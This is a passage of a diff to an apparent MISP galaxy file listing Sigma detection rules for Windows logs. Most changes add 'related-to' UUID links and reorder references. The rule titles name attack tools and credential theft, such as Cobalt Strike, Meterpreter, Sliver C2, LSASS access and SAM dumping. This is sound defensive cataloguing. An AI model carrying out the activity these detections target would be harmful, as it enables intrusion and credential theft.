"https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" ], "tags": [ @@ -7950,6 +10035,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b20f6158-9438-41be-83da-a5a16ac90c2b", "value": "Rare Scheduled Task Creations" }, @@ -7973,6 +10067,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", "value": "Suspicious Scheduled Tasks Locations" }, @@ -7989,8 +10092,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", + "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" ], "tags": [ @@ -8014,8 +10117,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/j00sean/status/1537750439701225472", "https://twitter.com/nas_bench/status/1539679555908141061", + "https://twitter.com/j00sean/status/1537750439701225472", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" ], "tags": [ @@ -8071,6 +10174,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", "value": "Code Integrity Blocked Driver Load" }, @@ -8095,6 +10207,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", "value": "Block Load Of Revoked Driver" }, @@ -8112,8 +10233,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/moti_b/status/1032645458634653697", "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", + "https://twitter.com/moti_b/status/1032645458634653697", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml" ], "tags": [ @@ -8137,9 +10258,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://twitter.com/KevTheHermit/status/1410203844064301056", "https://github.com/afwu/PrintNightmare", + "https://twitter.com/KevTheHermit/status/1410203844064301056", + "https://github.com/hhlxf/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml" ], "tags": [ @@ -8186,11 +10307,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", - "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", "https://winaero.com/enable-openssh-server-windows-10/", + "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", + "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", + "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" ], "tags": [ @@ -8214,9 +10335,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/afwu/PrintNightmare", "https://github.com/hhlxf/PrintNightmare", "https://twitter.com/fuzzyf10w/status/1410202370835898371", - "https://github.com/afwu/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml" ], "tags": [ @@ -8225,6 +10346,15 @@ "cve.2021.1675" ] }, + "related": [ + { + "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718", "value": "Possible CVE-2021-1675 Print Spooler Exploitation" }, @@ -8250,6 +10380,15 @@ "cve.2021.1675" ] }, + "related": [ + { + "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a", "value": "CVE-2021-1675 Print Spooler Exploitation" }, @@ -8325,6 +10464,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "value": "LSASS Access Detected via Attack Surface Reduction" }, @@ -8341,8 +10489,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands", "https://twitter.com/duff22b/status/1280166329660497920", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml" ], "tags": [ @@ -8352,6 +10500,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "value": "PSExec and WMI Process Creations Block" }, @@ -8392,8 +10556,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", "https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" ], "tags": [ @@ -8448,6 +10612,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", "value": "Windows Defender AMSI Trigger Detected" }, @@ -8472,6 +10645,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708", "value": "Windows Defender Threat Detected" }, @@ -8488,8 +10670,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml" ], "tags": [ @@ -8524,6 +10706,43 @@ "uuid": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "value": "Win Defender Restored Quarantine File" }, + { + "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "win_bits_client_direct_ip_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", + "value": "Suspicious Download with BITS from Direct IP" + }, { "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", "meta": { @@ -8546,6 +10765,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "value": "Suspicious Download File Extension with BITS" }, @@ -8571,6 +10799,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", "value": "Suspicious Task Added by Powershell" }, @@ -8596,6 +10833,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", "value": "Suspicious Task Added by Bitsadmin" }, @@ -8621,6 +10867,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "value": "Download with BITS to Suspicious Folder" }, @@ -8637,9 +10892,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" ], "tags": [ @@ -8648,6 +10903,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", "value": "Suspicious Download with BITS from Suspicious TLD" }, @@ -8664,8 +10928,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" ], "tags": [ @@ -8674,6 +10938,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "value": "Suspicious Uncommon Download with BITS from Suspicious TLD" }, @@ -8690,8 +10963,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://ngrok.com/", + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" ], "tags": [ @@ -8699,6 +10972,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", "value": "Ngrok Usage with Remote Desktop Service" }, @@ -8710,15 +10992,15 @@ "falsepositive": [ "Unknown" ], - "filename": "win_susp_dns_config.yml", + "filename": "win_dns_server_susp_dns_config.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", - "https://twitter.com/gentilkiwi/status/861641945944391680", "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_susp_dns_config.yml" + "https://twitter.com/gentilkiwi/status/861641945944391680", + "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml" ], "tags": [ "attack.defense_evasion", @@ -8751,6 +11033,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "52a85084-6989-40c3-8f32-091e12e13f09", "value": "smbexec.py Service Installation" }, @@ -8777,6 +11068,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "487c7524-f892-4054-b263-8a0ace63fc25", "value": "Invoke-Obfuscation Via Stdin - System" }, @@ -8803,6 +11103,22 @@ "attack.t1134.002" ] }, + "related": [ + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System" }, @@ -8877,6 +11193,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a31b18a-f00c-4061-9900-f735b96c99fc", "value": "Remote Access Tool Services Have Been Installed - System" }, @@ -8971,6 +11296,15 @@ "attack.t1584" ] }, + "related": [ + { + "dest-uuid": "7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", "value": "Windows Update Error" }, @@ -9021,6 +11355,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", "value": "PAExec Service Installation" }, @@ -9047,6 +11390,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System" }, @@ -9073,6 +11425,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", "value": "Invoke-Obfuscation Via Use Rundll32 - System" }, @@ -9097,6 +11458,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "value": "Service Installed By Unusual Client - System" }, @@ -9121,6 +11491,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "value": "PowerShell Scripts Installed as Services" }, @@ -9137,9 +11516,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://www.sans.org/webcasts/119395", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml" ], "tags": [ @@ -9151,6 +11530,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", "value": "CobaltStrike Service Installations - System" }, @@ -9174,6 +11562,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "839dd1e8-eda8-4834-8145-01beeee33acd", "value": "SAM Dump to AppData" }, @@ -9190,9 +11587,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" ], "tags": [ @@ -9226,6 +11623,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System" }, @@ -9251,6 +11657,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", "value": "Hacktool Service Registration or Execution" }, @@ -9267,8 +11682,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/zerosum0x0/CVE-2019-0708", "https://github.com/Ekultek/BlueKeep", + "https://github.com/zerosum0x0/CVE-2019-0708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" ], "tags": [ @@ -9277,6 +11692,15 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", "value": "Potential RDP Exploit CVE-2019-0708" }, @@ -9300,6 +11724,15 @@ "attack.lateral_movement" ] }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", "value": "Zerologon Exploitation Using Well-known Tools" }, @@ -9326,6 +11759,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation STDIN+ Launcher - System" }, @@ -9375,6 +11817,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", "value": "Mesh Agent Service Installation" }, @@ -9402,6 +11853,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "value": "Sliver C2 Default Service Installation" }, @@ -9452,6 +11912,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", "value": "Invoke-Obfuscation VAR+ Launcher - System" }, @@ -9549,6 +12018,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", "value": "Sysmon Crash" }, @@ -9575,6 +12053,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System" }, @@ -9625,6 +12112,15 @@ "car.2016-04-002" ] }, + "related": [ + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "value": "Eventlog Cleared" }, @@ -9697,6 +12193,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "value": "QuarksPwDump Clearing Access History" }, @@ -9723,6 +12228,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "value": "ProcessHacker Privilege Elevation" }, @@ -9826,6 +12340,15 @@ "car.2016-04-002" ] }, + "related": [ + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", "value": "System Eventlog Cleared" }, @@ -9842,9 +12365,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" ], "tags": [ @@ -9924,6 +12447,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f512acbf-e662-4903-843e-97ce4652b740", "value": "Volume Shadow Copy Mount" }, @@ -9973,6 +12505,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", "value": "TacticalRMM Service Installation" }, @@ -10029,6 +12570,50 @@ "attack.s0005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "value": "Credential Dumping Tools Service Execution - System" }, @@ -10052,6 +12637,15 @@ "attack.t1048" ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "value": "Tap Driver Installation" }, @@ -10083,6 +12677,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + 